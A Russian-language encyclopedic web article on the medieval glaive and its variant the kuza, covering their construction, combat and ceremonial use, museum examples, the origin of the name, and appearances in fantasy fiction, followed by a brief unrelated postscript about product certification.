Глефа представляет собой тяжелый широкий (5-7 см) наконечник в форме тесака или ножа, длиной 40-60 см, лезвие только с одной стороны. Древко боевой глефы 1,2-1,5 м. Навершие крепится к древку при помощи втулки и прожилин, которые предохраняют его от перерубания.

У нижнего конца острия располагается острый отросток или же – «отводящий крюк», «подток» или «пятка», похожий на крюк итальянских алебард. Обычно он был не заточенным, а лишь заостренным и использовался как противовес для улучшения баланса оружия, для добивания раненых.

С обратной от лезвия стороны, на обухе, находится прямой, выступающий вперед под углом в 90º или направленный вверх крюк, который еще называется «острым пальцем». Этот крюк служит для захвата оружия противника и для нанесения колющих ударов, пробивающих доспех рыцаря.

Также эти крючки помогали в захвате пленных благородного происхождения с целью получения богатого выкупа – они цеплялись за элементы доспеха или одежды, использовались для стягивания всадника с лошади.

Формы первых глеф были рассчитаны как на рубящий, так и на колющий удар, в отличие от образцов XVI–XVII веков, которые имели более причудливые формы и больше использовались как церемониальное оружие.

Считается, что существует около 100 различных модификаций глефы – как историчных, так и, пожалуй, выдуманных. Это могли быть экземпляры с обоюдоострыми одинаковыми в размерах узкими клинками на обоих концах древка или же глефы с наконечником, больше напоминающим топор с одной стороны и шарообразного противовеса в противоположной части древка.

Двухклинковая глефа встречается в творчестве Н. Перумова, но в Европе не существовала, правда подобное оружие было известно в Индии и Китае. Но это были индивидуальные виды вооружения, практически не пригодные для работы в строю.

В Китае существовали даже трехклинковые образцы – помимо двух наконечников по сторонам древка, имелся и третий, который располагался между двумя местами для хвата руками.

Позднее из-за своей небольшой эффективности глефы постепенно снялись с вооружения армий. Но и потом, вплоть до XVIII века она сохраняется в качестве оружия придворной стражи. И со временем, из-за ненадобности применения их в бою, они становятся почти не пригодными для удара.

Вследствие этого, изменяется и внешний вид глефы: широкое острие теперь изогнуто назад, со стороны обуха находится вырезанная насадка. Для повышения зрелищного эффекта древко удлиняется до 2,5 метра, торцевая часть древка снабжалась защитным диском.

В XV —  XVI веках они были весьма популярны при дворах Италии (особенно во Флоренции, Мантуе) и периодически во Франции. В Венеции стояли на вооружении славянской гвардии телохранителей при дожах.

Парадные и церемониальные глефы богато украшаются чернением, позолотой, травлением, надписями, изображениями гербов и прочих орнаментов.

С XVII века глефа стала применяться телохранителями при польском дворе под названием «куза» (польс. kosa, фр. couse).

Но еще с XV века куза очень часто встречается во Франции, а после сражения при монастыре Святого Якоба, что принимается на вооружение швейцарцами, бывшими на службе у французского короля. Это древковое оружие встречается в миниатюрах и рукописях XV века.

Куза была более простого вида, практически не отличается от глефы: также с наконечником в форме тесака, который таким же образом, при помощи втулки и длинных железных прожилин крепился на древке, дополнительные крючки не всегда присутствуют. Иногда, чуть ниже втулки располагается диск для защиты руки.

Из формы, пожалуй, можно заключить, что она больше предназначалась для рубящих ударов. В начале XVI в. кузой вооружается лейб-гвардия Филиппа I, короля Испании. И с того времени она начинает использоваться при большинстве немецких дворов.

В имперском собрании оружия в Вене до сих пор хранятся экземпляры куз всех императоров Австрии от Фердинанда I до Иосифа II, коллекцию дополняют образцы некоторых правящих эрцгерцогов. При Иосифе II кузы в последний раз использовались королевскими телохранителями. В настоящее время они используются швейцарской гвардией в Ватикане и служителями Тауэра.

Глефа. Интересные факты:

  1. В конце XV века каждого пехотинца в составе отряда, который приводил с собой в армию сюзерена рыцарь, называли «глефами» по оружию, которым они были вооружены. Из числа таких «глефов» формировались одни из первых больших отрядов пехоты.
  2. Очень многие исследователи, изучая происхождение слова «глефа», проводят параллель к латинскому слову gladius  и к кельтскому cladivos, которые обозначают «меч». Но ранние французские и английские источники под «глефой» подразумевают копье. В этом значении слово «глефа» остается в английском языке с XIV до середины XVI вв. А некоторые энциклопедии так совсем относят ее к алебардам. Примерно с XV века совершенно другой вид древкового оружия начинает подразумеваться под глефой. И около этого времени слово «глефа» становится поэтическим обозначением меча (особенно во французском языке).
  3. С начала 80-х годов под глефой почему-то обозначается еще и метательное оружие, похожее на японские сюрикены, но большего размера. Это выдуманное оружие, изредка появляется на страницах книг в фантастическом жанре и в художественных фильмах, например в фильме Крулл у главного героя имеется пятилепестковая «глефа». Этому фантастическому оружию приписывается свойство возвращаться как бумеранг к владельцу.
  4. В серии книг «Хранитель мечей» Ника Перумова глефа упоминается как любимое оружие главного героя Кэра Лаэды. Это нетипичный вариант глефы – два клинка с обоих концов древка, очень легкая (в отличие от исторической двуручной не предназначенной для легкого размахивания) и компактная, что позволяет ее использование в тесноте пещерных переходов и подземелий.

PostScriptum:
Среди российских производителей и поставщиков все большую популярность приобретает добровольная сертификация, благодаря которой повышается привлекательность и конкурентоспособность продукции в глазах заказчиков.

Источник: http://getwar.ru/glefa-kuza.html

Ссылка на основную публикацию